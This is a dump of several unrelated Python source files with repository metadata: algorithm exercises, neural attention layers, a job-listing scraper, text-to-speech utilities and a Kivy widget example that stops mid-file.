"num_heads": self.num_heads,
"attention_dropout": self.attention_dropout,
}
def call(self,
query_input,
source_input,
bias,
training,
cache=None,
decode_loop_step=None):
"""Apply attention mechanism to query_input and source_input.
Args:
query_input: A tensor with shape [batch_size, length_query, hidden_size].
source_input: A tensor with shape [batch_size, length_source,
hidden_size].
bias: A tensor with shape [batch_size, 1, length_query, length_source],
the attention bias that will be added to the result of the dot product.
training: A bool, whether in training mode or not.
cache: (Used during prediction) A dictionary with tensors containing
results of previous attentions. The dictionary must have the items:
{"k": tensor with shape [batch_size, i, heads, dim_per_head],
"v": tensor with shape [batch_size, i, heads, dim_per_head]} where
i is the current decoded length for non-padded decode, or max
sequence length for padded decode.
decode_loop_step: An integer, step number of the decoding loop. Used only
for autoregressive inference on TPU.
Returns:
Attention layer output with shape [batch_size, length_query, hidden_size]
"""
# Linearly project the query, key and value using different learned
# projections. Splitting heads is automatically done during the linear
# projections --> [batch_size, length, num_heads, dim_per_head].
query = self.query_dense_layer(query_input)
key = self.key_dense_layer(source_input)
value = self.value_dense_layer(source_input)
if cache is not None:
# Combine cached keys and values with new keys and values.
if decode_loop_step is not None:
cache_k_shape = cache["k"].shape.as_list()
indices = tf.reshape(
tf.one_hot(decode_loop_step, cache_k_shape[1], dtype=key.dtype),
[1, cache_k_shape[1], 1, 1])
key = cache["k"] + key * indices
cache_v_shape = cache["v"].shape.as_list()
indices = tf.reshape(
tf.one_hot(decode_loop_step, cache_v_shape[1], dtype=value.dtype),
[1, cache_v_shape[1], 1, 1])
value = cache["v"] + value * indices
else:
key = tf.concat([tf.cast(cache["k"], key.dtype), key], axis=1)
value = tf.concat([tf.cast(cache["v"], value.dtype), value], axis=1)
# Update cache
cache["k"] = key
cache["v"] = value
# Scale query to prevent the dot product between query and key from growing
# too large.
depth = (self.hidden_size // self.num_heads)
query *= depth**-0.5
# Calculate dot product attention
logits = tf.einsum("BTNH,BFNH->BNFT", key, query)
logits += bias
# Note that softmax internally performs math operations using float32
# for numeric stability. When training with float16, we keep the input
# and output in float16 for better performance.
weights = tf.nn.softmax(logits, name="attention_weights")
if training:
weights = tf.nn.dropout(weights, rate=self.attention_dropout)
attention_output = tf.einsum("BNFT,BTNH->BFNH", weights, value)
# Run the outputs through another linear projection layer. Recombining heads
# is automatically done --> [batch_size, length, hidden_size]
attention_output = self.output_dense_layer(attention_output)
return attention_output
class SelfAttention(Attention):
"""Multiheaded self-attention layer."""
def call(self,
query_input,
bias,
training,
cache=None,
decode_loop_step=None):
return super(SelfAttention, self).call(query_input, query_input, bias,
training, cache, decode_loop_step)
|
[
"[email protected]"
] | |
79700ce48d4aacbecddc068d807ecf3f56d9dc9c
|
c7a1470d2f6a15265e1f884c86439dc6d98b4484
|
/LintCode/trie/0442_Implement_Trie_(Prefix_Tree).py
|
7a674f32a78d465c8b92d461ef3d7d86a6c3d96c
|
[] |
no_license
|
GuanYangCLU/AlgoTestForPython
|
5239774fb6c840f3d65c4e4290ce8125fe8c94d3
|
dddbc8115f69dec636c62c755f02905c469155e0
|
refs/heads/master
| 2022-01-19T15:03:54.835403 | 2021-12-30T02:19:37 | 2021-12-30T02:19:37 | 122,312,195 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,196 |
py
|
class TrieNode:
def __init__(self):
self.children = {}
self.isWord = False
class Trie:
def __init__(self):
# do intialization if necessary
self.root = TrieNode()
"""
@param: word: a word
@return: nothing
"""
def insert(self, word):
# write your code here
node = self.root
for c in word:
if c not in node.children:
node.children[c] = TrieNode()
node = node.children[c]
node.isWord = True
def find(self, word):
node = self.root
for c in word:
if c not in node.children:
return None
node = node.children[c]
return node
"""
@param: word: A string
@return: if the word is in the trie.
"""
def search(self, word):
# write your code here
res = self.find(word)
return False if not res else res.isWord
"""
@param: prefix: A string
@return: if there is any word in the trie that starts with the given prefix.
"""
def startsWith(self, prefix):
# write your code here
return self.find(prefix) is not None
|
[
"[email protected]"
] | |
462ac9a85d6bc6fb7b67357293dc32fc8f1a8490
|
0f9c9e4c60f28aa00aff8b80e1e4c142c61d24ce
|
/Python/LeetCode/102_binary_tree_level_order_traversal.py
|
9bf5ae9c253e87223e6611d5901e3a0a777bd81d
|
[] |
no_license
|
shouliang/Development
|
c56fcc69e658393c138b63b507b96c48232128d5
|
b7e3b02c50d54515e584cb18dff83109224245d0
|
refs/heads/master
| 2020-03-22T09:14:51.070228 | 2019-08-29T02:50:26 | 2019-08-29T02:50:26 | 139,825,052 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,498 |
py
|
'''
二叉树按层次遍历
102. Binary Tree Level Order Traversal:https://leetcode.com/problems/binary-tree-level-order-traversal/
思路: 使用队列这种数据结构:首先根节点进入队列,然后在队列头部弹出节点的同时,将其左右分支依次插入队列的尾部,
直至队列为空
其实这就是图的bfs,但是二叉树就是一种特殊的图
'''
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def levelOrder(self, root):
"""
:type root: TreeNode
:rtype: List[List[int]]
"""
if not root:
return []
result = []
queue = [] # 队列
queue.append(root) # 根节点进入队列
while queue:
cur_level = []
level_size = len(queue)
for _ in range(level_size): # 遍历当前层,处理完当前层,再将当前层的一维数组加入到二维结果中
node = queue.pop(0) # 在队列头部弹出节点的同时,将其左右分支依次append()到队列的尾部
cur_level.append(node.val)
if node.left:
queue.append(node.left)
if node.right:
queue.append(node.right)
result.append(cur_level)
return result
class Solution2(object):
def levelOrder(self, root):
"""
:type root: TreeNode
:rtype: List[List[int]]
"""
if not root:
return []
result = []
queue = [] # 队列
queue.append(root) # 根节点进入队列
while queue:
node = queue.pop(0) # 在队列头部弹出节点的同时,将其左右分支依次append()到队列的尾部
result.append(node.val) # 处理结点,访问其相邻的节点并进入队列
if node.left:
queue.append(node.left)
if node.right:
queue.append(node.right)
return result
s = Solution()
root = TreeNode(3)
treeNode1 = TreeNode(9)
treeNode2 = TreeNode(20)
root.left = treeNode1
root.right = treeNode2
treeNode3 = TreeNode(15)
treeNode4 = TreeNode(7)
treeNode2.left = treeNode3
treeNode2.right = treeNode4
ret = s.levelOrder(root)
print(ret)
s2 = Solution2()
ret = s2.levelOrder(root)
print(ret)
|
[
"[email protected]:node/hunqing.git"
] |
[email protected]:node/hunqing.git
|
3703f80c8a35f44e25ab5acfc87a2c94b2001201
|
876de904572c611b8cbad21f50877cdc812f2946
|
/Leetcode/529. 扫雷游戏.py
|
3e649e9aaf806904b938e610485bcf270d5df164
|
[
"MIT"
] |
permissive
|
QDylan/Learning-
|
66a33de0e15f26672fb63c0b393866721def27ae
|
f09e0aa3de081883b4a7ebfe4d31b5f86f24b64f
|
refs/heads/master
| 2023-02-08T02:34:26.616116 | 2020-12-25T05:02:32 | 2020-12-25T05:02:32 | 263,805,536 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,152 |
py
|
# -*- coding: utf-8 -*-
"""
@Time : 2020/8/20 10:17
@Author : QDY
@FileName: 529. 扫雷游戏.py
@Software: PyCharm
"""
"""
让我们一起来玩扫雷游戏!
给定一个代表游戏板的二维字符矩阵。'M'代表一个未挖出的地雷,'E'代表一个未挖出的空方块,
'B'代表没有相邻(上,下,左,右,和所有4个对角线)地雷的已挖出的空白方块,
数字('1' 到 '8')表示有多少地雷与这块已挖出的方块相邻,'X'则表示一个已挖出的地雷。
现在给出在所有未挖出的方块中('M'或者'E')的下一个点击位置(行和列索引),根据以下规则,返回相应位置被点击后对应的面板:
如果一个地雷('M')被挖出,游戏就结束了- 把它改为'X'。
如果一个没有相邻地雷的空方块('E')被挖出,修改它为('B'),并且所有和其相邻的未挖出方块都应该被递归地揭露。
如果一个至少与一个地雷相邻的空方块('E')被挖出,修改它为数字('1'到'8'),表示相邻地雷的数量。
如果在此次点击中,若无更多方块可被揭露,则返回面板。
示例 1:
输入:
[['E', 'E', 'E', 'E', 'E'],
['E', 'E', 'M', 'E', 'E'],
['E', 'E', 'E', 'E', 'E'],
['E', 'E', 'E', 'E', 'E']]
Click : [3,0]
输出:
[['B', '1', 'E', '1', 'B'],
['B', '1', 'M', '1', 'B'],
['B', '1', '1', '1', 'B'],
['B', 'B', 'B', 'B', 'B']]
解释:
示例 2:
输入:
[['B', '1', 'E', '1', 'B'],
['B', '1', 'M', '1', 'B'],
['B', '1', '1', '1', 'B'],
['B', 'B', 'B', 'B', 'B']]
Click : [1,2]
输出:
[['B', '1', 'E', '1', 'B'],
['B', '1', 'X', '1', 'B'],
['B', '1', '1', '1', 'B'],
['B', 'B', 'B', 'B', 'B']]
解释:
注意:
输入矩阵的宽和高的范围为 [1,50]。
点击的位置只能是未被挖出的方块 ('M' 或者 'E'),这也意味着面板至少包含一个可点击的方块。
输入面板不会是游戏结束的状态(即有地雷已被挖出)。
简单起见,未提及的规则在这个问题中可被忽略。例如,当游戏结束时你不需要挖出所有地雷,考虑所有你可能赢得游戏或标记方块的情况。
"""
from collections import deque
class Solution:
def updateBoard(self, board, click):
if board[click[0]][click[1]] == 'M':
board[click[0]][click[1]] = 'X'
return board
h, w = len(board), len(board[0])
def mine_count(x, y):
res = 0
for dx in (-1, 1, 0):
for dy in (-1, 1, 0):
if 0 <= x + dx < h and 0 <= y + dy < w and board[x + dx][y + dy] in ('M', 'X'):
res += 1
return res
def dfs(x, y):
board[x][y] = mine_count(x, y)
if board[x][y] == 0:
board[x][y] = 'B'
for dx in (-1, 1, 0):
for dy in (-1, 1, 0):
nxt_x, nxt_y = x + dx, y + dy
if 0 <= nxt_x < h and 0 <= nxt_y < w and board[nxt_x][nxt_y] == 'E':
dfs(nxt_x, nxt_y)
else:
board[x][y] = str(board[x][y])
# dfs(click[0],click[1])
q = deque([(click[0], click[1])])
while q:
length = len(q)
for i in range(length):
x, y = q.popleft()
board[x][y] = mine_count(x, y)
if board[x][y] == 0:
board[x][y] = 'B'
for dx in (-1, 1, 0):
for dy in (-1, 1, 0):
nxt_x, nxt_y = x + dx, y + dy
if 0 <= nxt_x < h and 0 <= nxt_y < w and board[nxt_x][nxt_y] == 'E':
q.append((nxt_x, nxt_y))
board[nxt_x][nxt_y] = 'B'
else:
board[x][y] = str(board[x][y])
return board
|
[
"[email protected]"
] | |
a3a216ba5eb2add7fd1e92e28f32ec90873d2f02
|
f7d4993c3f9d840b3505e82567e673de00d91afc
|
/Code/rearrange.py
|
95a3ffe7b898c2f242d8bb2a8905229d5b2251a6
|
[] |
no_license
|
Andre-Williams22/CS-1.2-Intro-Data-Structures
|
026bb08c219ffcb7bafe43d3ea8426f821d6bc5c
|
a9effc2257a539456688c408ec4ae9e4d4d67e11
|
refs/heads/master
| 2022-12-10T00:12:31.879273 | 2019-12-12T07:10:33 | 2019-12-12T07:10:33 | 216,670,821 | 0 | 0 | null | 2022-09-23T22:30:43 | 2019-10-21T21:44:10 |
Python
|
UTF-8
|
Python
| false | false | 1,080 |
py
|
import random
import sys
# a = input('please type a word: ')
# b = input('please type a word: ')
# c = input('please type a word: ')
# d = input('please type a word: ')
# e = input('please type a word: ')
# words = []
# words.append(a)
# words.append(b)
# words.append(c)
# words.append(d)
# words.append(e)
# print ("The list before shuffling is : ", end="")
# for i in range(0, len(words)):
# print(words[i], end=" ")
# print("\r")
# random.shuffle(words)
# print(random.choice(words))
# # Printing list after shuffling
# print ("The list after shuffling is : ", end="")
# for i in range(0, len(words)):
# print (words[i], end=" ")
# print("\r")
def rearrange(words):
result = []
for i in range(len(words)):
word = random.choice(words)
result.append(word)
words.remove(word)
result = result [:-1]
return(result)
def reverse(words):
new_list = words[::-1]
print(new_list)
if __name__ == '__main__':
words = list(sys.argv[1:])
temp = rearrange(words)
print(temp)
print(reverse(temp))
|
[
"[email protected]"
] | |
85d6d96659e6ab8df9179e891d05df56649e2e6d
|
a8062308fb3bf6c8952257504a50c3e97d801294
|
/problems/N431_Encode_Nary_Tree_To_Binary_Tree.py
|
29be7e11dec99008b385e8fc593469702e866409
|
[] |
no_license
|
wan-catherine/Leetcode
|
650d697a873ad23c0b64d08ad525bf9fcdb62b1b
|
238995bd23c8a6c40c6035890e94baa2473d4bbc
|
refs/heads/master
| 2023-09-01T00:56:27.677230 | 2023-08-31T00:49:31 | 2023-08-31T00:49:31 | 143,770,000 | 5 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,213 |
py
|
"""
For any node in the N_ary tree:
his first child to Binary Tree's left child
all other children will be this first child(left child of BT)'s right child.
"""
class Node:
def __init__(self, val=None, children=None):
self.val = val
self.children = children
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Codec:
def encode(self, root):
"""Encodes an n-ary tree to a binary tree.
:type root: Node
:rtype: TreeNode
"""
if not root:
return
t = TreeNode(root.val)
if root.children:
t.left = self.encode(root.children[0])
cur = t.left
for node in root.children[1:]:
cur.right = self.encode(node)
cur = cur.right
return t
def decode(self, data):
"""Decodes your binary tree to an n-ary tree.
:type data: TreeNode
:rtype: Node
"""
if not data:
return
root = Node(data.val, [])
cur = data.left
while cur:
root.children.append(self.decode(cur))
cur = cur.right
return root
|
[
"[email protected]"
] | |
88d3dd854018f601e7960c53e13223c135447a52
|
9db281fbed35bb8384eeacaa81d1a32a9dcc5cca
|
/class-17/demo/monster-jobs/monster_jobs/scraper.py
|
0bb9e23c6da0da5a1287792a996e2dcec15b38c1
|
[] |
no_license
|
corey-marchand/seattle-python-401d14
|
aab3f48c82229f1958989ce8318de60b9abbe4e2
|
ae9ffebc9e5250cb5ec1760fd7764da0d3ad4e4c
|
refs/heads/master
| 2022-11-15T16:09:37.248530 | 2020-07-09T19:10:49 | 2020-07-09T19:10:49 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,355 |
py
|
import requests
from bs4 import BeautifulSoup
# Send a request to Monster webpage
URL = 'https://www.monster.com/jobs/search/?q=software-engineer&where=Seattle__2C-WA'
response = requests.get(URL)
# print(dir(response))
# Extract content
content = response.content
# Convert to BS object
soup = BeautifulSoup(content, 'html.parser')
# Find an element
results = soup.find(id='SearchResults')
# print(results.prettify())
jobs_list = results.find_all('section', class_='card-content')
# print(len(jobs_list))
final_results = []
for job in jobs_list:
job_dict = {'title': '', 'location':'', 'company':''}
found_title = job.find('h2', class_='title')
if found_title:
title = found_title.text.strip()
job_dict['title'] = title
found_location = job.find('div', class_='location')
if found_location:
location = found_location.text.strip()
job_dict['location'] = location
found_company = job.find('div', class_='company')
if found_company:
company = found_company.text.strip()
job_dict['company'] = company
final_results.append(job_dict)
# print(title)
# print('********************************')
# print(location)
# print('********************************')
# print(company)
# print('\n ############################# \n')
print(final_results)
|
[
"[email protected]"
] | |
5397b361705d553e3e3310f32c847b29f535c167
|
60d5ea4f007d49768d250ef394003f554003e4d0
|
/python/Depth-first Search/116.Populating Next Right Pointers in Each Node.py
|
885f028bc97eeb83c99f1867befd8577674b88a1
|
[] |
no_license
|
EvanJamesMG/Leetcode
|
dd7771beb119ea1250dbb3b147a09053298cd63b
|
fa638c7fda3802e9f4e0751a2c4c084edf09a441
|
refs/heads/master
| 2021-01-10T17:11:10.896393 | 2017-12-01T16:04:44 | 2017-12-01T16:04:44 | 46,968,756 | 5 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,655 |
py
|
# coding=utf-8
'''
Given a binary tree
struct TreeLinkNode {
TreeLinkNode *left;
TreeLinkNode *right;
TreeLinkNode *next;
}
Populate each next pointer to point to its next right node. If there is no next right node, the next pointer should be set to NULL.
Initially, all next pointers are set to NULL.
Note:
You may only use constant extra space.
You may assume that it is a perfect binary tree (ie, all leaves are at the same level, and every parent has two children).
For example,
Given the following perfect binary tree,
1
/ \
2 3
/ \ / \
4 5 6 7
After calling your function, the tree should look like:
1 -> NULL
/ \
2 -> 3 -> NULL
/ \ / \
4->5->6->7 -> NULL
'''
# Definition for singly-linked list.
'''
深度优先搜索
'''
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
'''
一个递归就搞定了,就是递归让每一个节点他的左右子树通过next链接,直至到最后一层,
然后递归左右节点,继续让他们的左右子树通过next链接。
'''
class Solution(object):
def connect(self, root):
"""
:type root: TreeLinkNode
:rtype: nothing
"""
if root:
LR = root.left
RL = root.right
while LR and RL:
LR.next = RL
LR = LR.right
RL = RL.left
self.connect(root.left)
self.connect(root.right)
|
[
"[email protected]"
] | |
83aafba4187bb26dfef831f2cb3ecf91c7677d01
|
04dddbf04893913b0b24c6c02ebd2672b774a616
|
/다이나믹 프로그래밍/11052 카드 구매하기.py
|
565e7ec0c89ae6471533ed01d0209c88d36b7020
|
[] |
no_license
|
hatssww/BOJ
|
ca16345dbe24641e1ca5adee136a858a64a080b0
|
bd7363d5c84de281de9b34667e9c0b76a904cffc
|
refs/heads/main
| 2023-05-24T22:23:35.127397 | 2021-06-08T23:36:40 | 2021-06-08T23:36:40 | 370,254,375 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 264 |
py
|
import sys
n = int(sys.stdin.readline())
p = [0] + list(map(int, sys.stdin.readline().split()))
d = [0] * (n + 1)
d[1] = p[1]
for i in range(2, n + 1):
for j in range(1, i + 1):
if d[i] < d[i - j] + p[j]:
d[i] = d[i - j] + p[j]
print(d[n])
|
[
"[email protected]"
] | |
810c374d5845fa02cb9141659fad67f933c09195
|
3abe7b4d572ae81a8222996821569bf3a684ec14
|
/text/__init__.py
|
e9461d87f13166dac13aea90ab80aead3a0ef212
|
[
"BSD-3-Clause",
"MIT"
] |
permissive
|
creotiv/RussianTTS-Tacotron2
|
6c8defdd5a9cafdd46b71f8006162c4bab586d0f
|
8ac15eea9450d141cb84d4d1a96b600f43d206c9
|
refs/heads/master
| 2023-06-01T09:43:12.209652 | 2021-06-10T12:54:24 | 2021-06-10T12:54:24 | 334,964,314 | 13 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,385 |
py
|
""" from https://github.com/keithito/tacotron """
import re
from text import cleaners
from text.symbols import symbols, ctc_symbols
# Mappings from symbol to numeric ID and vice versa:
symbol_to_id = {s: i for i, s in enumerate(symbols)}
_id_to_symbol = {i: s for i, s in enumerate(symbols)}
_ctc_symbole_to_id = {s: i for i, s in enumerate(ctc_symbols)}
# Regular expression matching text enclosed in curly braces:
_curly_re = re.compile(r'(.*?)\{(.+?)\}(.*)')
def text_to_sequence(text, cleaner_names):
'''Converts a string of text to a sequence of IDs corresponding to the symbols in the text.
The text can optionally have ARPAbet sequences enclosed in curly braces embedded
in it. For example, "Turn left on {HH AW1 S S T AH0 N} Street."
Args:
text: string to convert to a sequence
cleaner_names: names of the cleaner functions to run the text through
Returns:
List of integers corresponding to the symbols in the text
'''
sequence = []
# Check for curly braces and treat their contents as ARPAbet:
while len(text):
m = _curly_re.match(text)
if not m:
sequence += _symbols_to_sequence(_clean_text(text, cleaner_names))
break
sequence += _symbols_to_sequence(_clean_text(m.group(1), cleaner_names))
sequence += _arpabet_to_sequence(m.group(2))
text = m.group(3)
return sequence
def sequence_to_ctc_sequence(sequence):
return [_ctc_symbole_to_id[_id_to_symbol[s]] for s in sequence if _id_to_symbol[s] in ctc_symbols]
def sequence_to_text(sequence):
'''Converts a sequence of IDs back to a string'''
result = ''
for symbol_id in sequence:
if symbol_id in _id_to_symbol:
s = _id_to_symbol[symbol_id]
# Enclose ARPAbet back in curly braces:
if len(s) > 1 and s[0] == '@':
s = '{%s}' % s[1:]
result += s
return result.replace('}{', ' ')
def _clean_text(text, cleaner_names):
for name in cleaner_names:
cleaner = getattr(cleaners, name)
if not cleaner:
raise Exception('Unknown cleaner: %s' % name)
text = cleaner(text)
return text
def _symbols_to_sequence(symbols):
return [symbol_to_id[s] for s in symbols if _should_keep_symbol(s)]
def _arpabet_to_sequence(text):
return _symbols_to_sequence(['@' + s for s in text.split()])
def _should_keep_symbol(s):
return s in symbol_to_id and s is not '_' and s is not '~'
|
[
"[email protected]"
] | |
a0af01108c13fc966f89021c5c91150515e97d0d
|
b9c9215eb12ab8f0dcc4a5d964dc97ac2ad62257
|
/supervised_learning/0x11-attention/6-multihead_attention.py
|
76729225e985b407847cb68ae5dc2a513672b6cb
|
[] |
no_license
|
AndrewMiranda/holbertonschool-machine_learning-1
|
0318c2f45c863721b478acae26a5a874290e6445
|
e8a98d85b3bfd5665cb04bec9ee8c3eb23d6bd58
|
refs/heads/main
| 2023-01-19T00:34:15.264705 | 2022-07-25T15:10:43 | 2022-07-25T15:10:43 | 386,514,270 | 0 | 0 | null | 2021-07-16T04:58:08 | 2021-07-16T04:58:07 | null |
UTF-8
|
Python
| false | false | 3,218 |
py
|
#!/usr/bin/env python3
"""File that conatins the class MultiHeadAttention"""
import tensorflow as tf
sdp_attention = __import__('5-sdp_attention').sdp_attention
class MultiHeadAttention(tf.keras.layers.Layer):
"""Class that perform multi head attention"""
def __init__(self, dm, h):
"""
Class constructor
dm is an integer representing the dimensionality of the model
h is an integer representing the number of heads
dm is divisible by h
Sets the following public instance attributes:
h - the number of heads
dm - the dimensionality of the model
depth - the depth of each attention head
Wq - a Dense layer with dm units, used to generate the query matrix
Wk - a Dense layer with dm units, used to generate the key matrix
Wv - a Dense layer with dm units, used to generate the value matrix
linear - a Dense layer with dm units, used to generate the attention
output
"""
self.h = h
self.dm = dm
self.depth = dm // h
self.Wq = tf.keras.layers.Dense(units=dm)
self.Wk = tf.keras.layers.Dense(units=dm)
self.Wv = tf.keras.layers.Dense(units=dm)
self.linear = tf.keras.layers.Dense(units=dm)
super(MultiHeadAttention, self).__init__()
def call(self, Q, K, V, mask):
"""
Publci instance method
Args:
Q is a tensor of shape (batch, seq_len_q, dk) containing the input to
generate the query matrix
K is a tensor of shape (batch, seq_len_v, dk) containing the input to
generate the key matrix
V is a tensor of shape (batch, seq_len_v, dv) containing the input to
generate the value matrix
mask is always None
Returns: output, weights
outputa tensor with its last two dimensions as (..., seq_len_q, dm)
containing the scaled dot product attention
weights a tensor with its last three dimensions as
(..., h, seq_len_q, seq_len_v) containing the attention weights
"""
def split_heads(x, batch_size):
"""Split the last dimension into (num_heads, depth).
Transpose the result such that the shape is (batch_size,
num_heads, seq_len, depth)"""
x = tf.reshape(x, (batch_size, -1, self.h, self.depth))
return tf.transpose(x, perm=[0, 2, 1, 3])
batch_size = tf.shape(Q)[0]
q = self.Wq(Q) # (batch_size, seq_len, d_model)
k = self.Wk(K) # (batch_size, seq_len, d_model)
v = self.Wv(V) # (batch_size, seq_len, d_model)
q = split_heads(q, batch_size)
k = split_heads(k, batch_size)
v = split_heads(v, batch_size)
scaled_attention, attention_weights = sdp_attention(q, k, v, mask)
scaled_attention = tf.transpose(scaled_attention,
perm=[0, 2, 1, 3])
concat_attention = tf.reshape(scaled_attention, (batch_size, -1,
self.dm))
output = self.linear(concat_attention)
return output, attention_weights
|
[
"[email protected]"
] | |
0c24daedded2881c22f5beb167c8ee8b0efba4f0
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/55/usersdata/112/23295/submittedfiles/av2_p3_civil.py
|
190a7d9f68a0de2937c3818addab0a1181fc2f81
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 822 |
py
|
# -*- coding: utf-8 -*-
from __future__ import division
import numpy as np
linhas=input('Digite a quandidade de linhas:')
a=np.zeros((linhas,linhas))
for i in range (0,a.shape[0],1):
for j in range(0,a.shape[1],1):
a[i,j]=input('Digite o termo:')
print a
x=input('Digite a coordenada x da localização da torre:')
y=input('Digite a coordenada y da localização da torre:')
def locali(a):
for i in range (0,a.shape[0],1):
for j in range (0,a.shape[1],1):
a[x,y]
return a[x,y]
print locali(a)
def soma_linha(a):
s=[]
for i in range (0,a.shape[0],1):
soma=0
for j in range (0,a.shape[1],1):
soma=soma+a[i,j]
s.append(soma)
for r in range(0,len(s),1):
c=s[y]
return c
print soma_linha(a)
|
[
"[email protected]"
] | |
181d1d5084af6522c9e3c33e95be5e086608176e
|
a38b4c82feabe5be163ad2eeb5a46f38aeb88d77
|
/regressions/checkPageRank.py
|
6980c594526fb6e07683fdcf02458c065697e1c9
|
[
"Apache-2.0"
] |
permissive
|
zzmjohn/vertexAPI2
|
a9ae240c2fde55dc5be4a96f0017e8a2e204b258
|
cf59a50d1239f3ea892a7473f8175958c7ac0051
|
refs/heads/master
| 2020-12-29T01:23:04.602915 | 2013-12-16T18:32:17 | 2013-12-16T18:32:17 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,570 |
py
|
#!/usr/bin/python2
#script to compare pagerank outputs
import sys
from math import fabs
#load ranks for file fn
def load( f ):
ret = {}
for line in f:
vid, val = line.strip().split()
ret[ int(vid) ] = float(val)
return ret
def compare( tol_vals, tol_allowed, test, gold ):
histo_counts = [0] * (len(tol_vals) + 1)
for vid, val in test.items():
try:
diff = fabs( gold[ vid ] - val )
pos = len(tol_vals) - 1
while pos >= 0 and diff < tol_vals[pos]:
pos -= 1
histo_counts[pos + 1] += 1
except KeyError:
print "vid ", vid, " is in test but not in gold"
#this is not an error, we just output all vertices
#but powergraph does not
#return False
totalItems = float(len(test))
for idx in range(len(histo_counts)):
histo_counts[idx] /= totalItems
if histo_counts[idx] > tol_allowed[idx]:
print "Percentage too high: ", tol_allowed[idx], histo_counts[idx]
return False
return True
if __name__ == '__main__':
if len( sys.argv ) != 3:
print "Usage: checkPageRank.py test gold"
sys.exit(1)
test = sys.argv[1]
gold = sys.argv[2]
td = load( open(test) )
gd = load( open(gold) )
#this means we allow up to 100% of values differing by less than .0001
#.9% of values by more than .0001 and less than .001
#.09% of values by more than .001 and less than .01
#.009% of values by more than .01 and less than .1
#0 values more than .1
if not compare( [.0001, .001, .01, .1, 1, 10], [1., 1e-2, 5e-3, 5e-4, 5e-5, 5e-6, 0], td, gd ):
sys.exit(1)
|
[
"[email protected]"
] | |
b5aab17911c032c7a93a159e063628fc4536e61e
|
bcb56cc126ea1885eb5ecc920884e2e331def045
|
/Part A/Déjà Vu.py
|
a510d4a81463d13148adb3624a1c08c02197962b
|
[] |
no_license
|
priyanshkedia04/Codeforces-Solutions
|
2d11cb7b8329fe658f983b7212c17fc89fd784f0
|
a5197c633bf4c3238f48bfb5b308144c2ffba473
|
refs/heads/main
| 2023-06-06T13:10:13.787843 | 2021-07-01T14:06:52 | 2021-07-01T14:06:52 | 382,000,707 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 222 |
py
|
for i in range(int(input())):
s = input()
temp1 = s + 'a'
temp2 = 'a' + s
if temp2 != temp2[::-1]:
print('YES')
print(temp2)
elif temp1 != temp1[::-1]:
print('YES')
print(temp1)
else:
print('NO')
|
[
"[email protected]"
] | |
7e79b503b18d0387b9dfa5034bb0f9a4e2e53d84
|
48d1002394d233cf5932c7ef69300400af79118a
|
/examples/widgets/effectwidget.py
|
aeaf2d149fa96c8762405a9a404318773e80f479
|
[
"LGPL-2.1-only",
"MIT",
"Apache-2.0"
] |
permissive
|
kivy/kivy
|
ba2668bffe4e125fd1c5aace54f671343802850e
|
ca1b918c656f23e401707388f25f4a63d9b8ae7d
|
refs/heads/master
| 2023-09-04T02:27:05.311875 | 2023-08-26T08:00:20 | 2023-08-26T08:00:20 | 1,049,095 | 16,076 | 4,161 |
MIT
| 2023-09-09T07:55:18 | 2010-11-03T20:27:32 |
Python
|
UTF-8
|
Python
| false | false | 5,485 |
py
|
'''
Example usage of the effectwidget.
Currently highly experimental.
'''
from kivy.app import App
from kivy.uix.effectwidget import EffectWidget
from kivy.uix.spinner import Spinner
from kivy.uix.boxlayout import BoxLayout
from kivy.lang import Builder
from kivy.properties import ObjectProperty
from kivy.uix.effectwidget import (MonochromeEffect,
InvertEffect,
ChannelMixEffect,
ScanlinesEffect,
FXAAEffect,
PixelateEffect,
HorizontalBlurEffect,
VerticalBlurEffect)
class ComparisonWidget(EffectWidget):
pass
class EffectSpinner(Spinner):
pass
class SpinnerRow(BoxLayout):
effectwidget = ObjectProperty()
def update_effectwidget(self, *args):
effects = []
for child in self.children[::-1]:
text = child.text
if text == 'none':
pass
if text == 'fxaa':
effects.append(FXAAEffect())
if text == 'monochrome':
effects.append(MonochromeEffect())
if text == 'invert':
effects.append(InvertEffect())
if text == 'mix':
effects.append(ChannelMixEffect())
if text == 'blur_h':
effects.append(HorizontalBlurEffect())
if text == 'blur_v':
effects.append(VerticalBlurEffect())
if text == 'postprocessing':
effects.append(ScanlinesEffect())
if text == 'pixelate':
effects.append(PixelateEffect())
if self.effectwidget:
self.effectwidget.effects = effects
example = Builder.load_string('''
#:import Vector kivy.vector.Vector
BoxLayout:
orientation: 'vertical'
FloatLayout:
ComparisonWidget:
pos_hint: {'x': 0, 'y': 0}
size_hint: 0.5, 1
id: effect1
ComparisonWidget:
pos_hint: {'x': pos_slider.value, 'y': 0}
size_hint: 0.5, 1
id: effect2
background_color: (rs.value, gs.value, bs.value, als.value)
SpinnerRow:
effectwidget: effect1
text: 'left effects'
SpinnerRow:
effectwidget: effect2
text: 'right effects'
BoxLayout:
size_hint_y: None
height: sp(40)
Label:
text: 'control overlap:'
Slider:
min: 0
max: 0.5
value: 0.5
id: pos_slider
BoxLayout:
size_hint_y: None
height: sp(40)
Label:
text: 'right bg r,g,b,a'
Slider:
min: 0
max: 1
value: 0
id: rs
Slider:
min: 0
max: 1
value: 0
id: gs
Slider:
min: 0
max: 1
value: 0
id: bs
Slider:
min: 0
max: 1
value: 0
